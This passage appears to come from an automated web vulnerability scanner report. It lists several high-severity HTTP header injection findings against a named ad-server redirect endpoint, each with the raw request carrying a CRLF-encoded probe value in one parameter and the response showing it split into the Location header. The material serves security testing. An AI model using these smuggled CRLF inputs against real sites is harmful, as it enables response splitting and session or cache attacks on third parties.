Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a7nE49wyEqBnFrtm78ZaX0o2OsyGYiMg7m2y61YrEoLFFEtZcZcVHuZbtfYZdWZdMqunkh8hXdJMV7qyuwnb6Zd31YrfF7ZdHaZdZcuBIy9wW8lHAIKyiwcMc00Zak7oEsHwK9pmlnNAk7mWagqn1HdHnkUqQKbBfZbjJCIEZcSX0NeKkXZcYgEty1cNc9n1ZdbPxqhai4NxbZaNojkYckD2ZaZbexm46vaoR4Lec8ZanpYO8vXYSWUFZcDpwVYoeEtjgvPFfIZaerPRJ52vMvfWJywjb0Nm0vCtwPYpK01qZcduBctYaZaxEcCY4ICL2ANend6x8bZb6XVeavVw7GpQX3kjmV9sxX71eeGnd2vgrGZajoYpWfSAxPfrt1E3Zb2tW4IqeOMbFuZdURHkywVn0IWgielhVy3UD3TvCZdDUqMNDZaE5XKIGYZdSXU6wt3jfH0ZccalMRDXfUrrjNCPJWAEQZcLjmX6BwKnIuwI7jlXj91TwJoQUUqhg7NJZc5VqPZcRnlSj9v5AN4ZaO9ZdXamX3ZbJyi6Zb31La5mnnktL90esGEsG1U3rjEpbgGfKHmrHZahrq4NHuY0NT8NCLEBIAaX5Tc; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:19 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=32241
b96b6c5512a
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the cs:e request parameter is copied into the Location response header. The payload 66fce%0d%0aea3a706a45f was submitted in the cs:e parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=66fce%0d%0aea3a706a45f&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a4nEV8SZdIgAQfvqP3FdK03mNKNZbJXOVdW25JtEY3qo2ZacZcUoj1oUOZaSROF3GPdcow2vGtpqdEKXBlN8ixBtwlSe3aExrw9SVjenhywPDXa9ZaHpGhVSVx3wssBnrKsiF7OyCqsUyyV2fKLnAkQJXl0NExTInKA63ZcDbEnW120aN8ajLB8xVFIt1G5jZaUnL7KPxpehg0MrXNcWI6S0LkXVqc1bDZbQIxV8GAlXZbJs6asy5eiirAmFRAoGj7Zdx7RZbtg7XBI24UCLx8Gjo8Rgafb8IsmvdVZdWRmrJ5Sr8X8r0DAsxEf7BD0ItZadJIV7m4S7kRFpHZaaNMwc5aanhnZbklHZacyKhZdqWow97J9kWSPMpkBs2JZc7aoyc6ZbnU8ohSvZdV7nZdviXWa4Zbc97UiaV9aZdS62MZbFxAJBK0IiNcK8c5nCQqJcHUDt4w1XqaxBdPDv8vgiS3cCTMEt8OkXfk3xHt7yXavKM9tcLwpu1HgehgrJseJWnA8ZaZbAZaBupUjdhm61e8y2SZbXapJ5UoPUWfIZaI2VOHDKprGV2PoI3pgZcgqJwoHL2jMfYxQ5IOTbDfUPyhE; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:12 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=66fce
ea3a706a45f&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the cs:pro request parameter is copied into the Location response header. The payload c30a3%0d%0a6e4c5584b26 was submitted in the cs:pro parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=c30a3%0d%0a6e4c5584b26&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=asnEN7xZduHZbPMx3snRZaKCVpj0fZbXPC329JQ48mlSMLXCUpGixImpnsfpFQbOJppT6O4n16J4YyQvXCPVuKiZbtdZdpZaYvfYi0UEl7VA5vqcc8exZci1rx7VYVM5JmdMcZco29l3IIXZbIGMl2WpA88RAexDbGPr8VQVZbK9reQYrcyDxD95yfIqZaZaEUF5SmIFDBWefkOZdll7reK9ZdwCABWm63sabBWYqTdZd3YlvEAcpSRYbogmfxmbpyGAaCeZb0uspaES9u0qaJZauZaWA8K8apK4Jg2AqAwGGfu9UcnZc4Lf8Y0M38hUeZdHKwKWfNwmourin30o4fK6ZdSmIPlGNds47lRlg1qurBx0XTZbHgOMlpJkZclt3CYuNoVFQMZbm9JnSsQ9ZbuWpZaB0x614VlnZdG7wO02wvZbdtHacxr6ZdgQZal45TZdxDMRsYyFXVFZcZbU0mdDWPUmYd92t8suYHoZayMAGb2QPnZbBE6SOaZdZbqmxRMil6QZcsm15JrvEAZcWxdcsme2LD1ZdRC6mXfFhjtRZbAnY1rWSF1tITejqjMxt1vFugjsr9pByQCGNZbRNEWJSFMnDsIHtCo; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:55 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=c30a3
6e4c5584b26&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the migAgencyId request parameter is copied into the Location response header. The payload e521c%0d%0aa2e49ee6de7 was submitted in the migAgencyId parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=e521c%0d%0aa2e49ee6de7&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ainEV8t3epZb8MpmSEhguZcUWNwZdBI2ssyZbATjOLZc7v9LQCmG3q8si3DASEyaZbf6qWajKQEFb4apKZbIWM0uWakyQmwycxHMgFlP1pXkvE1adD2VN1CculVNMPrO8vYVwOkCLpZdEMbJWSD6ilDJUtoZa1T1iYUyVZayZb1jRwTDWMW7y6xK2CUSYanJGN17mpnFIYjAT9aZdjWP6Du5wKfkaMuRaZarQFfI6Zblih3LAVqQjK151xi5vLdN4EyNfqVJHeotkBsvcxcH0flybHRWl0jnEYOn3NevXEZcBdV84G6q49QXIvKHcHEtMJyisLLD2G9ZaXNAwd6y8ZbT86ffQBYwLBLIbwcBJTJEcHmIYcMPl303JWQIkpejPxZdTgbIEtjFcm9JkdKFLafHE9A6OtlInaw9OBn2epGF2PukpERku6mmkiQC1ubFZdLvNBg2NuGrGFm7Zc7rQoxT3lCGCZbYKXxYJGAI8YPop4PKQEwGq3iFX9ASeUkUnN1JdeojUIA7qGPmDvgF6ZaZbLPehSMZcvJWFabKRNWvuC3Zc4j12P72OSEa346BTTypJUDipoEMEeEY4tBM0; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:41 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=e521c
a2e49ee6de7&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the migRandom request parameter is copied into the Location response header. The payload 15bea%0d%0a72b9d1a767d was submitted in the migRandom parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=15bea%0d%0a72b9d1a767d&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aInEV8qkaBJDBcN6JQjv1USjRZaHKuy4dGfuk8lQjvPQZbZcyUDZb8t4XEt2Q5BjXYmF5H2N5wd9nZaKdEZdubrqxKdEfZdfZbqAZcEUaFNwY6pYBETBIOJKvGdVJ3ohSqISuxl7o50Zcawny3t6cOKZc92U7fO0xDXQb99JlqkRIFDtX1Q6yDPF69BGxAvxZbZdZbQPWShwGTwMcu8GnbT8a4jZaMOWZbXilR4sLZcTEWoZbFMLtvrdcdZdl4JXYRcacrWVZcEB9lJ9MGgCwBkSm4ruEoyI8OZaRnbbruyXLNNNZbkW3BFL9yoRXRLFFLYhptNUro76ZdfYLAJ0WfNUPKvrtJ9SPordSBxoxw1KOHv1BZckmbyuIeTydC4wbcjRGlhFFCr7SZaUnuCdvsX8Px4MHMD6Fp7Wcb5SsRMfJbjcLbjuCZcZaQDVaeZaRbjaJKnvMAIkTZb3351OqQMJHvgdQQ2sEQHLa0xVZbZbvQvk1EqbZdsn4iqoqbm0jtrUXnrjva55HGC9Y86bZahebkdnPZbWZd9jWZcqA6SZcCLZbNvohL5EAtjCY3sk34qxBikMEZdRcLd59uXUSqjpp8SUybXD0aV; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:28 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=15bea
72b9d1a767d&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the migSource request parameter is copied into the Location response header. The payload 31b5f%0d%0a1d727e3388a was submitted in the migSource parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=31b5f%0d%0a1d727e3388a&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aWnEV8ujikfm2QoVYK8wZcGUZawZbHw6QtwYmQOBOeapBnqlnvCdLZdLMHOFrTrBO1AW6tw33hNmpZc9wiS6CiUy102LRJyWFrQaZdBFogfrqKSL9h0eCZawdetS555VpLYsyWIRX79Wtu16JwUhXMYS318gkf9LD02UC70Sj9pZaQnyQ7FpwBkGuqxO4ZbJMnOnZdUqVA14gMi6S5f280RneXj3VUSiDIZdZdisFr8QU8hGxVv16c2aBRCgEURULZcb9hrb3ILc7AfiANSHRa4STvtiUQ1awquLfhIYZaRc8KGRyWxAd2x2IQOCvNsy6pUMgnsZaiGtdUqWod1GlGGphgZaeE9oP98VJt9hWpuUKqoygZcxQPiPxums0R1vb22FJsbMVruyFZcFt2E53cJK6GBmTNuDE5Zcl3qtgPTNpC5M94MiS8YdKPJfZcugdrevrO7Kkn01BTKZdZbtwavFZc3Zb7ni61g6JYASspkrM0AQepj4QHlNFfvYXcGRbZc178PwiBDhbp77hJQZcA5MhnODoUh3DeiZaZbyXZcvMNZaU8tB1JCgIurkZd4ydrnclN4lsZbXZaIb3lGXtUTrRW55L; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:42 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=31b5f
1d727e3388a&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the migTrackDataExt request parameter is copied into the Location response header. The payload ee931%0d%0acbd419af417 was submitted in the migTrackDataExt parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=ee931%0d%0acbd419af417&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
